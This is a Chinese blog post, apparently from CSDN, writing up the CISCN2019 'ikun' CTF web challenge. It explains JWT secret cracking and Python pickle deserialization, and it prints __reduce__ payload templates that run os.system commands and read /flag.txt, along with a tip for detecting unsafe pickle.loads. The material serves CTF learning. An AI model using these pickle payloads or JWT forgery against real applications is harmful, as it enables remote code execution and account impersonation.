2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化

最新推荐文章于 2024-08-09 08:04:07 发布
最新推荐文章于 2024-08-09 08:04:07 发布
阅读量624 收藏
点赞数 1
分类专栏: webctf 文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119252907
版权

文章目录

前言

一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!!

前置知识

参考大佬博客:
https://www.cnblogs.com/Cl0ud/p/12177062.html
https://www.cnblogs.com/wangtanzhi/p/12178311.html

一、JWT

JWT解码网站
Json Web Token详解
JWT破解工具
jwtcrack用法:

./jwtcrack+密文
//可以解出秘钥,然后去jwt解码网站可以更改姓名

二、Python-pickle反序列化

python-pickle反序列化讲解
Python魔术方法讲解:

C-pickle反序列化漏洞:

Python中有个库可以实现序列化和反序列化操作,名为pickle或cPickle,作用和PHP的serialize与unserialize一样,两者只是实现的语言不同,一个是纯Python实现、另一个是C实现,函数调用基本相同,但cPickle库的性能更好,因此这里选用cPickle库作为示例。

cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数:

cPickle.dump(obj, file, [,protocol]):将Python对象序列化保存到本地的文件中。

obj:想要序列化的obj对象。 file:文件名称。
protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

cPickle.load(file):载入本地文件,将文件内容反序列化为Python对象。

file:文件名称。

cPickle.dumps(obj[, protocol]):将Python对象序列化为字符串。

obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

cPickle.loads(string):将字符串反序列化为Python对象。

string:文件名称。

【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码

检测这种反序列化漏洞的方法:

全局搜索Python代码中是否含有关键字类似“import cPickle”或“import
pickle”等,若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。

魔术方法:
pickle

注意:以下payload都是python2的环境下,去Python3运行之后结果是错误的。。。。。

修改reduce魔术方法的通用模板:

import cPickle
 
class Person(object):
    def __init__(self,username,password):
        self.username = username 
        self.password = password 
 
    def __reduce__(self):
    	# 未导入os模块,通用
    	return (__import__('os').system, ('calc.exe',))
    	# return eval,("__import__('os').system('calc.exe')",)
    	# return map, (__import__('os').system, ('calc.exe',))
    	# return map, (__import__('os').system, ['calc.exe'])
 
    	# 导入os模块
        # return (os.system, ('calc.exe',))
        # return eval, ("os.system('calc.exe')",)
        # return map, (os.system, ('calc.exe',))
        # return map, (os.system, ['calc.exe'])
 
admin = Person('admin','123456')
result = cPickle.dumps(admin)
 
user = cPickle.loads(result)

通用payload:

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
       #return (eval,("import('os').system('ls')",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

解题过程

由于大佬们的过程都十分详细了,我就不过多赘述了。
总的就是先写脚本找lv6,
然后替换jwt,
最后python-pickle的__reduce__反序列化漏洞利用。

总结

写完这个题,总的思路和知识点学到了很多,仍有一个不明白的点,就是最后的payload看大哥们都是同一个,直接打开flag.txt获得flag,但是怎么找到flag.txt没写出来payload,难受啊,希望有会的大哥能带带我!!!

Sakura-501
关注
专栏目录
一堆IKUN知识点
lljloimjo的博客
01-31 658
s[k,1]:=1;s[1,k]:=1;//将一个势为50的集合分成5份的拆分数。1 6 4 -> 8 4(用最少的步数)说明:当n=8 时有30条对角线分别用了l和r数组控制,(4)8数码难题 :2 8 3 1 2 3。
SpringBoot实战:解决JwtUser反序列化问题
Byte_O_O的博客
08-14 203
而在一些情况下,我们可能会遇到JwtUser反序列化的问题,导致无法正确地将JwtUser对象从JSON字符串转换为Java对象。在Spring Security中,JwtUser一般实现了UserDetails接口,同时需要实现Serializable接口以支持对象的序列化和反序列化。造成这个问题的原因很多,可能是由于JwtUser类的字段发生了变化,或者是缺少了无参构造方法等。希望本文对你有所帮助!通过以上修改,我们可以保证旧的JSON字符串能够正确地反序列化为新的JwtUser对象。
ciscn2021 反序列化
weixin_45805993的博客
07-05 213
正好还留着当时的源码,先发一波 <?phpclass Fake{ public $firm; public $test; public function __set($firm,$test){ $test = "No,You can't"; $firm = unserialize($firm); call_user_func($firm,$test); }}class Temp{ public $pri; public $fin=1; public function __destruct() {
JWT Cracker 使用教程
最新发布
gitblog_00778的博客
08-09 623
JWT Cracker 使用教程 jwt-crackerSimple HS256, HS384 & HS512 JWT token brute force cracker.项目地址:https://gitcode.com/gh_mirrors/jw/jwt-cracker 1. 项目目录结构及介绍 以下是jwt-cracker项目的典型目录结构: ├── Dockerfile ...
JWT+python反序列化漏洞 [CISCN2019 华北赛区 Day1 Web2]ikun
weixin_45782091的博客
03-22 5321
前面的步骤不是很重要 (主要是这个题太魔性) 主要是一个去找lv6所在页面 import requests url = "http://b9ac92ba-7b09-4b78-9ed8-540734732bff.node4.buuoj.cn:81/shop?page=" i=1 while True: r = requests.get(url + str(i)) if 'lv6.png' in r.text: print (i) break i=i+1
CSS3——pointer-events
Chosen Wu的博客
06-01 977
pointer-events使用者控制特定的图形元素在何时成为鼠标事件的target 这个属性我觉得和html标签属性的disabled差不多一个特别有用的地方就是当我们设置属性值为none时,可以指示鼠标事件穿过该元素,并指向位于元素下面的元素。 也就是可以出发该元素底部元素的点击事件,这一点在页面布局时候是很有用的。兼容性IE11+ 所以只适用于移动端 初始值:auto poin
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8595
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 605
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
BUUCTF ,拿下[CISCN2019 华北赛区 Day1 Web2]ikun的flag
qq_43309162的博客
03-29 309
拿下BUUCTF 题目华北赛区ikun的flag
CISCN-WEB-ikun
迷风小白
09-17 3535
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
Python Pickle反序列化漏洞
Lemon's blog
11-15 4736
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
Python-pythonjwt一个用来生成和验证JSONWebTokens的模块
08-11
python-jwt:一个用来生成和验证 JSON Web Tokens的模块
JWTPyCrack.zip
01-17
非常快速的jwt密码破解工具!
一道CTF题看JWTpython反序列化
weixin_44377940的博客
06-20 2131
目录题目题解知识点JWTPython 序列化与反序列化 题目 题为[CISCN2019 华北赛区 Day1 Web2]ikun 题解 打开,看到这里 看来要找到lv6,写个小脚本: #[CISCN2019 华北赛区 Day1 Web2]ikun,找lv6 import requests url = "http://9592eed0-512a-4494-bedb-332fdf504447.node3.buuoj.cn/shop?page=" for i in range(0,2000): r=requ
JWT解密和python反序列化之[CISCN2019 华北赛区 Day1 Web2]ikun
qq_58970968的博客
08-30 514
解密,可以得到结果,但是想要伪造其他的用户的话需要密钥,密钥使用c-jwt-cracker 中的 ./jwtcrack 进行破解;PicklePython内的一个标准模块,实现了基本的数据序列化和反序列化。破解得到密钥之后在网址中填入得到伪造jwt;burp更改就可以了;和cookie一个类型,用于认证身份,将jwt值放在。pickle.laods 反序列化pickle.dumps 序列化。...
[CISCN2019 华北赛区 Day1 Web2]ikun (JWT更改与python反序列化)
EC_Carrot的博客
12-23 660
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 提示是要买到Iv6,有很多页面,需要写脚本来找 import requests url="http://5d13c449-296b-4491-9240-52ac885c1bc3.node3.buuoj.cn/shop?page=" for i in range(0,400): r=requests.get(url+str(i)) if '
24、25-反序列化漏洞(JBoss、apache log4、apache Shiro、JWT)Weblogic未授权访问、代码执行、任意上传
XLbb的博客
05-16 1865
serialize() 和 unserialize() 在 PHP内部实现上是没有漏洞的,之所以会产生反序列化漏洞是因为应用程序在处理对象、魔术函数以及序列化相关问题的时候导致的。 当传给 unserialize() 的参数可控时,那么用户就可以注入精心构造的 payload。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。 CVE-2021-2109Weblogic Server远程代码执行。apache log4j (Java日志记录库)
CVE-2022-39227jwt伪造
qq_32445755的博客
11-12 1307
python jwt是一个用于生成和验证JSON Web令牌的模块。3.3.4之前的版本会受到欺骗绕过身份验证的影响,从而导致身份欺骗、会话劫持或身份验证绕过。获得JWT的攻击者可以在不知道密钥的情况下任意伪造其内容。根据应用程序的不同,这可能使攻击者能够欺骗其他用户的身份、劫持他们的会话或绕过身份验证。用户应升级到版本3.3.4。没有已知的解决方法。
[JWT]JWT与爆破
qq_55271156的博客
05-08 1343
浅析JWT爆破的方法,适合小白食用
爱坤HTML源码分享:ikun-kunkun专属网站构建
资源摘要信息:"ikun-kunkun-吃掉坤坤爱坤-html-源码.rar" 该文件似乎是一个关于中国流行音乐歌手蔡徐坤(Kun)的粉丝文化相关的网页项目源代码压缩包。从标题和描述来看,该项目可能是由粉丝创建的,以表达对蔡徐坤...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值